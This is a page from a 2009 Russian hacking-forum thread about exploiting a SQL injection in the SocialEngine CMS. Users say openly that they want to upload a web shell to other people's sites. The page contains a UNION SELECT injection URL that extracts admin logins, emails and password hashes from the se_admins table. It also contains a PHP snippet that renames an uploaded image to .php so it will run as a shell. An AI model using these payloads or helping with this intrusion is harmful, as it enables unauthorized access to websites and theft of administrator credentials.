ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Social Engine SQL инекция !
   
 
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 21.01.2009, 04:43
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686

Репутация: 531


По умолчанию
читай тему что я показал. а админку и пароль лучше убери, засерут
 

Спасибо что ответили
  #12  
Старый 21.01.2009, 15:34
eworld.uz
Познающий
Регистрация: 18.01.2008
Сообщений: 31
Провел на форуме:
114816

Репутация: 13
Отправить сообщение для eworld.uz с помощью ICQ
По умолчанию Спасибо что ответили
У меня просто есть этот двиг вот и показал вам пример таблицы на phpmyadmin сегодня буду пробовать все что посоветовали ! Ели что стукните мне в аску есть хорошый сайт на этот двиг надо залить шелл )
 

  #13  
Старый 21.01.2009, 16:02
eworld.uz
Познающий
Регистрация: 18.01.2008
Сообщений: 31
Провел на форуме:
114816

Репутация: 13
Отправить сообщение для eworld.uz с помощью ICQ
По умолчанию
Друзья прочитал все темы но так и не смог залит шелл ( Помогите
 

  #14  
Старый 21.01.2009, 16:12
krobol
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527

Репутация: 14
Отправить сообщение для krobol с помощью ICQ
По умолчанию
Присоединяюсь, тоже не смог залить.
По ссылке от NFM всё прочитал, пробовал - не получилось.

В дирректорию /uploads_user/ заливал картинки - 1.jpg с шеллом,
2.jpg:

PHP код:
<?php
   system("mv /var/www/admin/data/www/domen.com/uploads_user/1000/2/1.jpg /var/www/admin/data/www/domen.com/uploads_user/1000/2/1.php");
   die();
?>
но include через SQL не получается.

xcedz, через шаблоны тоже не работает - там даже в шапке редактора написано, что PHP отделён от шаблонов.
 

  #15  
Старый 22.01.2009, 11:29
eworld.uz
Познающий
Регистрация: 18.01.2008
Сообщений: 31
Провел на форуме:
114816

Репутация: 13
Отправить сообщение для eworld.uz с помощью ICQ
По умолчанию
Krobol Какие успехи ?
 

  #16  
Старый 22.01.2009, 11:53
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
https://forum.antichat.ru/thread50669.html

гляньте диры пхпмай админа, на всякий случай. =)
Последний раз редактировалось xcedz; 22.01.2009 в 12:20..
 

  #17  
Старый 22.01.2009, 12:25
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию
PHP код:
browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION+SELECT+concat(admin_username,admin_email,0x3a,admin_password),2,3+from+se_admins 

поставил такой запрос но не работает как вывести хеш и логин админа


стукните в аську додумаем вместе как залить шел 858759
Последний раз редактировалось heks; 22.01.2009 в 12:34..
 

  #18  
Старый 22.01.2009, 17:15
krobol
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527

Репутация: 14
Отправить сообщение для krobol с помощью ICQ
По умолчанию
eworld.uz, у меня пока ничего не получилось

heks, не на всех сайтах работает
 

  #19  
Старый 22.01.2009, 18:40
eworld.uz
Познающий
Регистрация: 18.01.2008
Сообщений: 31
Провел на форуме:
114816

Репутация: 13
Отправить сообщение для eworld.uz с помощью ICQ
По умолчанию
Думаю работает только для версии 3.10
 

  #20  
Старый 23.01.2009, 11:30
c0m
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме:
191945

Репутация: 7
По умолчанию
Цитата:
Сообщение от eworld.uz  
Думаю работает только для версии 3.10
не только все зависит от самого плагина
 
 
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ